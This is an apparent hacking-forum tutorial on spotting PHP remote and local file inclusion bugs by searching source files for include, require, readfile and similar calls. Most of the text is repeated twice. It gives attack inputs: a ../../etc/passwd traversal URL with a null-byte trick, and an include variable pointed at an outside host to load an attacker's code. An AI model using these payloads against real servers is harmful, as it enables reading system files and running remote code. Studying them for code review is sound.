tut how to Find RFI & LFI Vulnerability Static analysis by Domo
Open all of the PHP files in "WinRAR"; at the top go to "Find", Then
File names to find "*" string to find and Search for:
"require"
"require_once"
"include"
"include_once"
"$_GET"
"'.php';"
" ".php";"
"require_once($"
"readfile"
"system"
"eval"
For RFI vulnerabilities find:
include($test_path . "/test.php");
include $test_path . '.php';
If an attacker can control the value of the test_path variable;
they can replace it with something like "http://example.com/test.php?test="
or "http://test.com/test.php?test_path=" and, instead of picking up test.php
from the local filesystem, PHP will happily reach out across the net to pick
up the attacker's code. One of the ways that an attacker can control the value
of a variable in a PHP program is through the use of the register_globals PHP
mis-feature.
For LFI vulnerabilities find:
include '/pages/'.$pagina;
Now we can include a local files by URL...
"http:///example.php?pagina=../../../../../../etc/passwd"
How The script will include "/pages/../../../../../../etc/passwd" successfully.
Sometimes u have to use a null byte example "%00":
readfile($pagina);
The readfile() function will Allows you to read a local file on a server
"http:///example.php?pagina=../../../../../../etc/passwd"
Sometimes u have to use a null byte example "%00":
Open all of the PHP files in "WinRAR"; at the top go to "Find", Then
File names to find "*" string to find and Search for:
"require"
"require_once"
"include"
"include_once"
"$_GET"
"'.php';"
" ".php";"
"require_once($"
"readfile"
"system"
"eval"
For RFI vulnerabilities find:
include($test_path . "/test.php");
include $test_path . '.php';
If an attacker can control the value of the test_path variable;
they can replace it with something like "http://example.com/test.php?test="
or "http://test.com/test.php?test_path=" and, instead of picking up test.php
from the local filesystem, PHP will happily reach out across the net to pick
up the attacker's code. One of the ways that an attacker can control the value
of a variable in a PHP program is through the use of the register_globals PHP
mis-feature.
For LFI vulnerabilities find:
include '/pages/'.$pagina;
Now we can include a local files by URL...
"http:///example.php?pagina=../../../../../../etc/passwd"
How The script will include "/pages/../../../../../../etc/passwd" successfully.
Sometimes u have to use a null byte example "%00":
readfile($pagina);
The readfile() function will Allows you to read a local file on a server
"http:///example.php?pagina=../../../../../../etc/passwd"
Sometimes u have to use a null byte example "%00":
if you like my posts and want to see more please plus rep
![[Image: FiHzeWA.jpg]](https://i.imgur.com/FiHzeWA.jpg)